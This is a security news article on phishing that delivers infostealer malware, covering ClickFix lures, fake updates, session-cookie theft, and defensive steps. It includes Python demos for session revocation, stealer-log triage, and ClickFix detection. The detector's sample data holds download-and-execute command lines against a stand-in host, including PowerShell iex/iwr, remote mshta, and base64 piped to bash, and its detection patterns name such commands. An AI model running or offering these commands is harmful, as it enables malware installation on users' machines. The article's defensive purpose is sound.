Cybercriminals Move Beyond Fake Login Pages as Infostealer Malware Becomes a Go-To Phishing Payload


Cybercriminals are changing how they run phishing attacks. Instead of relying only on fake login pages that ask victims to type passwords, many campaigns now try to install infostealer malware that can quietly collect saved passwords, cookies, tokens, autofill data, crypto wallet details, and files from the victim’s device.

The shift makes phishing more dangerous because attackers no longer need a user to enter credentials on a fake website. A successful infection can give them a much wider set of identity data in one operation. Malwarebytes researchers said infostealers have become attractive because they reduce friction, scale well, and remain widely available in criminal markets.

Traditional phishing still matters, especially for business email compromise and account takeover. However, attackers increasingly want the browser session itself. A stolen session cookie or authentication token can help them enter accounts even when multi-factor authentication protects the password.

Why infostealers are replacing simple credential theft in some campaigns

A fake login page can steal a username and password, but it has limits. The victim has to trust the page, type the information, and sometimes complete MFA. Infostealer malware skips much of that process by collecting data already stored inside browsers, apps, and local files.

The stolen data can include work passwords, personal passwords, payment details, browser cookies, session tokens, screenshots, crypto wallet files, and cloud service credentials. SpyCloud’s 2026 Identity Exposure Report said the company recaptured 8.6 billion stolen cookies and session artifacts tied to malware infections, showing how valuable session hijacking has become.

This changes the economics of phishing. One infected device can generate many kinds of data that attackers can sell to different buyers. Account takeover crews, fraud groups, ransomware affiliates, and initial access brokers can all use the same stolen identity package.

Attack method | What it tries to steal | Main risk
--- | --- | ---
Fake login page | Usernames and passwords | Account takeover if the victim enters credentials
Adversary-in-the-middle phishing | Credentials, MFA flow data, and session tokens | MFA bypass and live session takeover
Infostealer malware | Passwords, cookies, tokens, wallet data, files, and browser data | Large-scale identity theft from one infected device
ClickFix lure | Initial code execution through copied commands | Malware installation after the user runs a command
Fake update prompt | Device access through a malicious installer | Malware delivery disguised as a browser or software update

How phishing now delivers infostealers

Modern phishing does not always start with an email that links to a fake Microsoft, Google, or banking page. Attackers now use malicious ads, fake browser updates, fake CAPTCHA pages, cracked software downloads, game cheats, browser extensions, social media messages, and compromised websites to push malware.

In March, Malwarebytes documented a campaign that used compromised WordPress sites and fake CAPTCHA pages to deliver the Vidar infostealer to Windows users. The lure asked users to run a command, which eventually installed the malware.

The same tactic has also moved beyond Windows. Malwarebytes found a macOS infostealer called Infiniti Stealer that used a fake verification page to trick users into pasting a Terminal command. That campaign showed how ClickFix-style social engineering can target Mac users too.

ClickFix and fake updates are helping malware spread

ClickFix attacks work because they turn the victim into the execution step. A page claims there is a verification problem, browser issue, file access error, or security warning. It then tells the user to copy and paste a command into Windows Run, PowerShell, Terminal, or another system tool.

This technique sidesteps many of the signals users and mail filters associate with phishing. There may be no attachment, no exploit, and no fake login form. The attack succeeds only because the user follows instructions from a convincing page, which means the first reliable place to catch it is usually endpoint telemetry rather than the mail gateway.

Large-scale campaigns are now combining ClickFix with fake software updates. Silent Push researchers recently described DriveSurge, an initial access broker operation that compromises legitimate websites and routes visitors through infrastructure that can serve ClickFix prompts or FakeUpdates-style malware pages.

  • Fake CAPTCHA pages ask users to prove they are human by running a command.
  • Fake browser update pages offer a malicious installer instead of a real update.
  • Malicious ads can send users to spoofed download pages for popular apps.
  • Pirated software and cracked tools often bundle infostealers with the installer.
  • Compromised trusted sites can redirect visitors without the site owner knowing.

Why session cookies make MFA bypass easier

Multi-factor authentication still helps, but attackers have adapted. They increasingly target session cookies and authentication tokens because these artifacts can prove that a user has already logged in. If criminals can replay or abuse those tokens, they may not need the password or the MFA code.

SpyCloud reported that modern phishing datasets increasingly include session cookies, authentication tokens, and MFA workflow data. That makes identity exposure harder to solve with password resets alone.

This is why an infostealer infection can become a business incident, not just a personal device problem. A home computer used for work email, cloud dashboards, admin tools, or developer platforms can expose enterprise credentials and browser sessions.
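The following is an added example, not code from the article or from the Malwarebytes or SpyCloud reports it cites. It models a web application's session handling in memory to show why a stolen cookie is accepted without a password or MFA prompt, why a password reset alone leaves that cookie valid, and how a per-user "session generation" counter revokes every outstanding session at once. The user name, password, and time-to-live are constructed values.

```python
import secrets
import time

# Constructed in-memory model of a web app's session handling.
# Added example for this article; not taken from any real product.


class SessionStore:
    """Sessions are bearer tokens: whoever presents a valid one is the user."""

    def __init__(self, ttl_seconds=30 * 24 * 3600):
        self.ttl = ttl_seconds
        self.sessions = {}    # cookie value -> {"user", "generation", "expires"}
        self.generation = {}  # user -> int, incremented to revoke all sessions
        self.passwords = {}   # user -> password (plain text only for the demo)

    def login(self, user, password, mfa_code_ok, now):
        """Full login: password and MFA are checked once, then a cookie is issued."""
        if self.passwords.get(user) != password or not mfa_code_ok:
            return None
        cookie = secrets.token_urlsafe(32)
        self.sessions[cookie] = {
            "user": user,
            "generation": self.generation.get(user, 0),
            "expires": now + self.ttl,
        }
        return cookie

    def authenticate_cookie(self, cookie, now):
        """Every later request: no password, no MFA, only the cookie is checked."""
        s = self.sessions.get(cookie)
        if s is None or now >= s["expires"]:
            return None
        if s["generation"] != self.generation.get(s["user"], 0):
            return None  # revoked after it was issued
        return s["user"]

    def reset_password(self, user, new_password):
        """A reset that only changes the secret leaves every issued cookie valid."""
        self.passwords[user] = new_password

    def revoke_all_sessions(self, user):
        """Bump the per-user generation; every cookie issued earlier stops working."""
        self.generation[user] = self.generation.get(user, 0) + 1


def demo():
    """Walk through theft, replay, reset, and revocation; returns what happened."""
    now = time.time()
    store = SessionStore()
    victim = "alice@example.com"                    # constructed user
    store.passwords[victim] = "old-password"        # constructed password
    victim_cookie = store.login(victim, "old-password", True, now)

    # An infostealer copies the cookie out of the victim's browser profile.
    stolen = victim_cookie
    results = {}
    # 1. Replay from the attacker's machine: accepted with no password or MFA.
    results["replay_works"] = store.authenticate_cookie(stolen, now + 3600) == victim
    # 2. The victim resets the password; the stolen cookie is still accepted.
    store.reset_password(victim, "new-password")
    results["replay_after_reset"] = store.authenticate_cookie(stolen, now + 7200) == victim
    # 3. The security team revokes all sessions; the cookie is now rejected ...
    store.revoke_all_sessions(victim)
    results["replay_after_revoke_rejected"] = store.authenticate_cookie(stolen, now + 7300) is None
    # 4. ... while the real user can sign in again with password and MFA.
    fresh = store.login(victim, "new-password", True, now + 7400)
    results["user_relogin_works"] = store.authenticate_cookie(fresh, now + 7500) == victim
    return results


if __name__ == "__main__":
    print(demo())
```

The generation counter is one common way to implement "sign out everywhere": the account record carries a version, each session remembers the version it was issued under, and a mismatch rejects the request. Whatever mechanism a real identity provider uses, the point is the same: a reset changes the password, but only revocation changes what an already-issued cookie is worth.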

What attackers do with stolen infostealer logs

Infostealer logs rarely stay with the original attacker. Many operators collect the data, package it, and sell it on criminal markets. Buyers can search for company domains, cloud services, VPN credentials, crypto wallets, password manager traces, and browser cookies.

The Malwarebytes report explains why this model scales so well. Attackers can automate infections, harvest large volumes of identity data, and reuse that data across many types of fraud and intrusion workflows.

Drive-by campaigns also feed the same market. Silent Push said DriveSurge appears to operate as an initial access broker using a pay-per-install model, meaning infected systems can become leads for other criminals.

Stolen item | How criminals use it
--- | ---
Saved passwords | Log in to email, cloud, banking, social, and business accounts
Session cookies | Hijack logged-in sessions and bypass some MFA checks
Authentication tokens | Access SaaS platforms, developer tools, or cloud accounts
Crypto wallet data | Steal funds or identify high-value victims
Local files | Find invoices, identity documents, keys, and business records
Browser autofill data | Collect addresses, payment hints, and account recovery details
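Buyers search stealer logs for company domains and live sessions; a security team that obtains a log tied to its own staff has to do the same search from the other side. The script below is an added example, not code from the article or its cited reports. It parses a constructed log in the URL/Username/Password block layout and the Netscape cookie layout (both constructed here; the exact layout varies by stealer family), picks out entries that touch corporate domains or the company's SaaS hosts, flags password reuse across corporate logins, and lists cookies that are still within their expiry and therefore candidates for session revocation. The domains, hosts, and cookie names are constructed.

```python
import re

# Constructed sample log. The URL/Username/Password block layout is a loose
# imitation of how stealer logs are commonly laid out; it is not a real log.
SAMPLE_PASSWORDS_TXT = """\
URL: https://login.microsoftonline.com/
Username: j.doe@acme-corp.example
Password: Winter2024!
Application: Google Chrome
===============
URL: https://www.facebook.com/login
Username: jdoe1987@gmail.example
Password: ilovecats
Application: Google Chrome
===============
URL: https://vpn.acme-corp.example/remote/login
Username: jdoe
Password: Winter2024!
Application: Microsoft Edge
===============
URL: https://github.com/login
Username: j.doe@acme-corp.example
Password: gh-pass-123
Application: Google Chrome
===============
"""

# Netscape cookie format: domain, include_subdomains, path, secure,
# expiry (epoch seconds), name, value. Values are constructed.
SAMPLE_COOKIES_TXT = """\
.acme-corp.okta.example\tTRUE\t/\tTRUE\t1924992000\tsid\tconstructed-session-value-1
.facebook.com\tTRUE\t/\tTRUE\t1924992000\tc_user\tconstructed-value-2
login.microsoftonline.com\tFALSE\t/\tTRUE\t1924992000\tsession\tconstructed-value-3
"""

CORP_DOMAINS = {"acme-corp.example"}                          # constructed
# SaaS hosts the constructed company relies on; a live cookie here matters
# even when the username is not a corporate address.
CORP_SAAS_HOSTS = {"login.microsoftonline.com", "acme-corp.okta.example", "github.com"}


def parse_password_blocks(text):
    """Split 'Key: value' blocks separated by lines of '=' into dicts."""
    entries, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or set(line) == {"="}:
            if current:
                entries.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip().lower()] = value.strip()
    if current:
        entries.append(current)
    return entries


def host_of(url):
    m = re.match(r"^[a-z]+://([^/:]+)", url, re.I)
    return m.group(1).lower() if m else ""


def in_corp_domain(host):
    return any(host == d or host.endswith("." + d) for d in CORP_DOMAINS)


def is_corporate(entry):
    """Corporate if the username is a company address or the host is company-run."""
    user = entry.get("username", "").lower()
    host = host_of(entry.get("url", ""))
    if "@" in user and user.rsplit("@", 1)[1] in CORP_DOMAINS:
        return True
    return in_corp_domain(host) or host in CORP_SAAS_HOSTS


def parse_live_corporate_cookies(text, now_epoch):
    """Cookies for company domains or SaaS hosts whose expiry is still in the future."""
    live = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 7:
            continue
        domain, _, _, _, expiry, name, _ = parts
        domain = domain.lstrip(".").lower()
        if int(expiry) > now_epoch and (in_corp_domain(domain) or domain in CORP_SAAS_HOSTS):
            live.append((domain, name))
    return live


def triage(passwords_txt, cookies_txt, now_epoch):
    exposed = [e for e in parse_password_blocks(passwords_txt) if is_corporate(e)]
    accounts = sorted({(host_of(e["url"]), e["username"].lower()) for e in exposed})
    by_password = {}
    for e in exposed:
        by_password.setdefault(e["password"], set()).add(host_of(e["url"]))
    reused = [sorted(hosts) for hosts in by_password.values() if len(hosts) > 1]
    live_cookies = parse_live_corporate_cookies(cookies_txt, now_epoch)
    actions = [f"rotate credential and review sign-ins: {u} at {h}" for h, u in accounts]
    actions += [f"revoke sessions: cookie '{n}' for {d} is still within expiry" for d, n in live_cookies]
    return {"exposed_accounts": accounts, "reused_passwords": reused,
            "live_corporate_cookies": live_cookies, "actions": actions}


if __name__ == "__main__":
    for line in triage(SAMPLE_PASSWORDS_TXT, SAMPLE_COOKIES_TXT, 1700000000)["actions"]:
        print(line)
```

Two details carry the weight here. A personal social-media login with a personal address is ignored, but a personal GitHub login made with a corporate address is not, because the company address is what a buyer searches for. And a cookie is treated as a revocation target purely on expiry: whether the server still honours it cannot be known from the log, so the safe assumption is that it does until the session is killed.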

How users and companies can reduce the risk

The most important rule is simple: never paste a command from a website, email, chat message, or pop-up into Windows Run, PowerShell, Command Prompt, Terminal, or a browser console. Real verification checks do not require users to run hidden system commands.

Users should also avoid sponsored ads when downloading software. It is safer to type the official website address directly or use a trusted app store. Cracked software, game cheats, unofficial browser extensions, and pirated tools remain high-risk sources for infostealers.

Companies should treat infostealer exposure as an identity incident. Password resets help, but they may not be enough if attackers stole active sessions, OAuth tokens, API keys, or browser cookies. Security teams should revoke sessions, rotate sensitive tokens, review login history, and check for new inbox rules, OAuth grants, and unauthorized devices.

  • Block known malware delivery domains and monitor newly registered domains.
  • Use endpoint detection rules for suspicious PowerShell, mshta, curl, wget, and Terminal activity.
  • Restrict browser password storage on managed devices where possible.
  • Enable phishing-resistant MFA, such as passkeys or hardware security keys, for critical accounts.
  • Revoke sessions after suspected infostealer infections, not just passwords.
  • Monitor dark web and malware-log sources for exposed corporate credentials.
  • Train employees to recognize ClickFix, fake CAPTCHA, and fake update prompts.
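The ClickFix section above describes the behaviour that the endpoint-detection bullet asks teams to hunt for: a user-facing process (the Run dialog's parent is explorer.exe, or a browser, or a terminal) launching an interpreter with a command line that downloads and executes something. The following is an added example, not a rule from the article, Malwarebytes, Silent Push, or any EDR vendor. It scores constructed process-creation events with a small set of regular expressions and an interactive-parent heuristic; the host names, URLs, and command lines are constructed, and the thresholds are assumptions a team would tune against its own telemetry.

```python
import re

# Parents a ClickFix victim typically types or pastes into: the Run dialog
# (child of explorer.exe), a browser, or a terminal. Constructed heuristic.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "terminal", "iterm2"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "bash", "zsh", "sh", "osascript"}

# (regex, label). Each hit adds 2 to the score.
SUSPICIOUS_PATTERNS = [
    (r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", "encoded PowerShell"),
    (r"(?i)\b(?:iex|invoke-expression)\b", "Invoke-Expression"),
    (r"(?i)\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|net\.webclient)\b",
     "in-script download"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-e(?:xecutionpolicy|p)\s+bypass", "execution policy bypass"),
    (r"(?i)\bmshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)", "mshta remote or inline script"),
    (r"(?i)\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b", "download piped to shell"),
    (r"(?i)base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b", "base64 decode piped to shell"),
    (r"(?i)not a robot|captcha|verification id", "CAPTCHA/verification text in command line"),
]

# Constructed process-creation events, in the shape an EDR or Sysmon
# event ID 1 pipeline would hand a detection function.
SAMPLE_EVENTS = [
    {"host": "WS-101", "parent_image": "explorer.exe", "image": "mshta.exe",
     "command_line": 'mshta https://constructed-lure.example/verify.hta # "I am not a robot - reCAPTCHA Verification ID: 8823"'},
    {"host": "WS-102", "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell -w hidden -ep bypass -c \"iex (iwr 'https://constructed-lure.example/c.txt' -UseBasicParsing)\""},
    {"host": "MBP-7", "parent_image": "Terminal", "image": "bash",
     # base64 of the literal string "constructed-payload"
     "command_line": "echo 'Y29uc3RydWN0ZWQtcGF5bG9hZA==' | base64 -d | bash"},
    {"host": "WS-103", "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe"},                       # user opened a console
    {"host": "DEV-4", "parent_image": "code.exe", "image": "powershell.exe",
     "command_line": r"powershell -NoProfile -File C:\dev\build.ps1"},  # build task
    {"host": "WS-104", "parent_image": "cmd.exe", "image": "curl.exe",
     "command_line": "curl -o out.zip https://downloads.example/tool.zip"},  # plain download
]


def score_event(event):
    """Return (score, indicators) for one process-creation event."""
    score, hits = 0, []
    parent = event["parent_image"].lower()
    image = event["image"].lower()
    cmd = event["command_line"]
    if parent in INTERACTIVE_PARENTS:
        score += 2
        hits.append(f"launched from {parent}")
    if image in INTERPRETERS:
        score += 1
        hits.append(f"interpreter {image}")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if re.search(pattern, cmd):
            score += 2
            hits.append(label)
    return score, hits


def detect_clickfix(events, threshold=5):
    """Events at or above the threshold; interactive parent + interpreter alone is not enough."""
    alerts = []
    for e in events:
        score, hits = score_event(e)
        if score >= threshold:
            alerts.append({"host": e["host"], "score": score, "indicators": hits,
                           "command_line": e["command_line"]})
    return alerts


if __name__ == "__main__":
    for a in detect_clickfix(SAMPLE_EVENTS):
        print(a["host"], a["score"], "; ".join(a["indicators"]))
```

The threshold is chosen so that a user simply opening PowerShell from the Start menu (interactive parent plus interpreter, score 3) does not fire, while a single download-and-execute indicator on top of that does. The last pattern is the least durable: the reassuring "I am not a robot" text that fake CAPTCHA pages append to the pasted command is easy for an operator to change, so it should raise confidence rather than be the only trigger.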

The phishing threat is becoming more device-focused

The move from fake login pages to infostealer payloads shows how phishing has become more device-focused. Attackers still use social engineering, but the goal often shifts from capturing one password to compromising the browser, the session, and the local identity footprint.

The Vidar campaign and the Infiniti Stealer campaign show the same broader pattern across Windows and macOS. Attackers want users to install or execute something that gives them access to everything the browser already knows.

For defenders, the lesson is clear. Phishing prevention can no longer focus only on spotting fake login pages. It must also cover malware delivery, session theft, browser data protection, command execution, and the fast-growing market for stolen identity logs.

FAQ

What is an infostealer in phishing attacks?

An infostealer is malware that quietly collects data from an infected device. It can steal saved passwords, browser cookies, session tokens, autofill data, files, and crypto wallet information.

Are fake login pages still used in phishing attacks?

Yes. Fake login pages remain common, but many attackers now combine them with infostealers, adversary-in-the-middle phishing kits, fake updates, and ClickFix lures to steal more than just passwords.

How do infostealers bypass multi-factor authentication?

Infostealers can steal session cookies or authentication tokens from a browser. If those artifacts remain valid, attackers may use them to access an account without entering the password or completing MFA again.

What is ClickFix?

ClickFix is a social engineering tactic that tricks users into copying and running a command on their own device. Attackers often disguise it as a browser error, CAPTCHA check, update issue, or security warning.

What should users do after a suspected infostealer infection?

Users should disconnect the device from the network, run a trusted security scan, change passwords from a clean device, revoke active sessions, reset browser sync where needed, rotate sensitive tokens, and check accounts for suspicious activity.
